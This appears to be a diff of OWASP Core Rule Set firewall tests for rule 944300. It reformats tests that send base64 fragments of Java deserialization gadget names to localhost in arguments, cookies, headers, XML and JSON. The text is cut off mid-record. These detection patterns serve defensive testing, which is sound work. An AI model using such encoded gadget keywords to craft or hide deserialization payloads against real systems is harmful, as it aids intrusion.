"localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 282 desc: "XML element value 
includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": 
\"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 302 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id 
\"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 